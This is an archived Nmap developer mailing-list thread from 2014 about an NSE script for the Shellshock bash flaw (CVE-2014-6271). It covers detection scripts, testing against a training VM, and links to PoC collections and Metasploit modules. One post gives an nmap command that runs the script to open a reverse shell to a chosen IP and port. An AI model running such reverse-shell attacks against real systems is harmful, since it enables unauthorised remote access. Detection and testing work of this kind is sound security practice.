Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Shritam Bhowmick <shritam.bhowmick () gmail com>
Date: Sat, 11 Oct 2014 20:12:05 +0530
Hi list, while working on the script and the POC, I found out post exploitation would be great added advantage. Regards Shritam Bhowmick Technical Specialist and Web Application Penetration Tester, Defencely http://www.defencely.com The information contained herein (including any accompanying documents) is confidential and is intended solely for the addressee(s). It may contain proprietary, confidential, privileged information or other information subject to legal restrictions. If you are not the intended recipient of this message, please do not read, copy, use or disclose this message or its attachments. Please notify the sender immediately and delete all copies of this message and any attachments. This e-mail message including attachment(s), if any, is believed to be free of any virus. However, it is the responsibility of the recipient to ensure for absence of viruses. OpenFire Technologies shall not be held responsible nor does it accept any liability for any damage arising in any way from its use. On Fri, Oct 10, 2014 at 5:24 AM, stripes <stripes () tigerlair com> wrote:
Same here. I can help test. -Anne On Thu, Oct 09, 2014 at 06:35:58PM -0500, Richard Miles wrote:You rock Paulino, awesome!! I can't help much, but I'm available to test. Thanks On Thu, Oct 9, 2014 at 9:35 AM, Paulino Calderon <paulino () calderonpale com>wrote:I think it is definitely worth working on detection modules. I will go through all of the PoCs over the weekend to improve the detectionmodulefor http and submit other scripts for the other well-known services. Cheers. On Oct 2, 2014, at 4:57 PM, Richard Miles <richard.k.miles () googlemail com>wrote: Hi guys, This vulnerability is awesome, why not create a set of tests for common vulnerable applications? For example, test against well-know web applications, FTP Servers, SMTP, FTP servers, etc. I have seenexploits foralmost all these systems, I guess that a single script or a couple ofthemto detect would be AWESOME. Examples: Pure-FTPd External Authentication Bash Environment Variable CodeInjectionby Frank Denis, Spencer McIntyre, and Stephane Chazelas exploits - Metasploit Apache mod_cgi Bash Environment Variable Code Injection by wvu, juan vazquez, Stephane Chazelas, and lcamtuf exploits CVE-2014-6278 -MetasploitApache mod_cgi Bash Environment Variable RCE Scanner by wvu, Stephane Chazelas, and lcamtuf exploits CVE-2014-6278 and - Metasploit Here is a collection of POCs: https://github.com/mubix/shellshocker-pocshttps://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.htmlWhat do you think guys? Thanks. On Wed, Oct 1, 2014 at 3:11 AM, Paulino Calderon <paulino () calderonpale comwrote:Hello everyone, I???ve cleaned up the script and improved a few things:https://bitbucket.org/cldrn/nmap-nse-scripts/src/111b0a2439b22cb287572f5b45fd7991814ec6cf/scripts/6.x/http-shellshock.nse?at=masterI???ve tested the script against the VM and it works perfectly.Obviouslymore testing is appreciated but i think it is ready for submission. Cheers. On Sep 26, 2014, at 3:45 AM, Paul Amar <paul () sensepost com> wrote:Hi list, I created a NSE script for the Shell Shock vulnerability(CVE-2014-6271).I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso. This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments. Eg. ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-argshttp-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status<ip> -d Feel free if you have any feedback, Paul<http-vuln-cve-2014-6271.nse>_______________________________________________Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/-- Surrealism: (\`--/') _ _______ .-r-. You have two giraffes. >.~.\ `` ` `,`,`. ,'_'~`. The government requires you to (v_," ; `,-\ ; : ; \/,-~) \ take harmonica lessons. `--'_..),-/ ' ' '_.>-' )`.`.__.') stripes at tigerlair dot com ((,((,__..'~~~~~~((,__..' `-..-'fL _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 01)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 02)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) stripes (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Shritam Bhowmick (Oct 11)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 14)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Dec 01)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 02)